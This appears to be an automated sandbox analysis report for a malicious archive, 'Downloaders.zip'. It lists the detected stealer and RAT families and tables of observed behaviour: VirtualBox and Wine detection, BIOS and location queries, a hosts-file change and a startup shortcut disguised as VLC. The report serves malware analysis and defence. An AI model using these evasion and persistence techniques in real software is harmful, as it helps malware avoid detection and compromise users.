Analysis Overview
SHA256
16930620b3b9166e0ffbd98f5d5b580c9919fd6ccdcc74fb996f53577f508267
Threat Level: Known bad
The file Downloaders.zip was found to be: Known bad.
Malicious Activity Summary
AmmyyAdmin payload
Suspicious use of NtCreateUserProcessOtherParentProcess
RedLine payload
AsyncRat
Ammyy Admin
Redline family
Xworm family
Zharkbot family
Amadey
Detect Xworm Payload
Lumma Stealer, LummaC
Phorphiex payload
Quasar RAT
Xworm
Detects ZharkBot payload
Stealc
Quasar family
BabbleLoader
Neshta
Detect Neshta payload
Detects BabbleLoader Payload
Quasar payload
Asyncrat family
Ammyyadmin family
RedLine
Phorphiex, Phorpiex
FlawedAmmyy RAT
Phorphiex family
Lumma family
Flawedammyy family
ZharkBot
Neshta family
Amadey family
Stealc family
Babbleloader family
Async RAT payload
Identifies VirtualBox via ACPI registry values (likely anti-VM)
Command and Scripting Interpreter: PowerShell
Blocklisted process makes network request
Downloads MZ/PE file
Drops file in Drivers directory
Themida packer
Identifies Wine through registry keys
Checks computer location settings
Unsecured Credentials: Credentials In Files
Reads user/profile data of web browsers
Drops startup file
Executes dropped EXE
Checks BIOS information in registry
Loads dropped DLL
Modifies system executable filetype association
Reads data files stored by FTP clients
Legitimate hosting services abused for malware hosting/C2
Checks installed software on the system
Looks up external IP address via web service
Accesses cryptocurrency files/wallets, possible credential harvesting
Checks whether UAC is enabled
Writes to the Master Boot Record (MBR)
Indicator Removal: File Deletion
Adds Run key to start application
Enumerates processes with tasklist
Suspicious use of NtSetInformationThreadHideFromDebugger
UPX packed file
Suspicious use of SetThreadContext
Drops file in System32 directory
Drops file in Windows directory
Drops file in Program Files directory
Enumerates physical storage devices
System Network Configuration Discovery: Internet Connection Discovery
Embeds OpenSSL
Program crash
System Location Discovery: System Language Discovery
Detects Pyinstaller
Unsigned PE
Checks processor information in registry
Suspicious use of FindShellTrayWindow
Scheduled Task/Job: Scheduled Task
Modifies registry key
Modifies data under HKEY_USERS
Suspicious use of SendNotifyMessage
Suspicious use of AdjustPrivilegeToken
Modifies registry class
Suspicious use of WriteProcessMemory
Delays execution with timeout.exe
Detects videocard installed
Views/modifies file attributes
Runs ping.exe
Suspicious use of SetWindowsHookEx
Suspicious behavior: EnumeratesProcesses
Uses Task Scheduler COM API
MITRE ATT&CK
Analysis: static1
Detonation Overview
Reported
2024-11-26 19:01
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-26 19:01
Reported
2024-11-26 19:19
Platform
win10ltsc2021-20241023-en
Max time kernel
165s
Max time network
608s
Command Line
Signatures
Amadey
Amadey family
Ammyy Admin
AmmyyAdmin payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Ammyyadmin family
AsyncRat
Asyncrat family
BabbleLoader
Babbleloader family
Detect Neshta payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detects BabbleLoader Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Detects ZharkBot payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
FlawedAmmyy RAT
Flawedammyy family
Lumma Stealer, LummaC
Lumma family
Neshta
Neshta family
Phorphiex family
Phorphiex payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Phorphiex, Phorpiex
Quasar RAT
Quasar family
Quasar payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Redline family
Stealc
Stealc family
Suspicious use of NtCreateUserProcessOtherParentProcess
Xworm
Xworm family
ZharkBot
Zharkbot family
Async RAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\Files\random.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\100282~1\90B1CE~1.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\Files\TROJAN~1.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\rundll32.exe | N/A |
Command and Scripting Interpreter: PowerShell
Downloads MZ/PE file
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\drivers\etc\hosts | C:\Users\Admin\AppData\Local\Temp\Files\TROJAN~1.EXE | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\100282~1\90B1CE~1.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\Files\random.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\Files\TROJAN~1.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\Files\TROJAN~1.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\Files\random.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\100282~1\90B1CE~1.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\100301~1\AllNew.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Files\random.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\SubDir\Client.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\2946613613.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VLC_Media.lnk | C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VLC_Media.lnk | C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe | N/A |
Executes dropped EXE
Identifies Wine through registry keys
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\Files\random.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe | N/A |
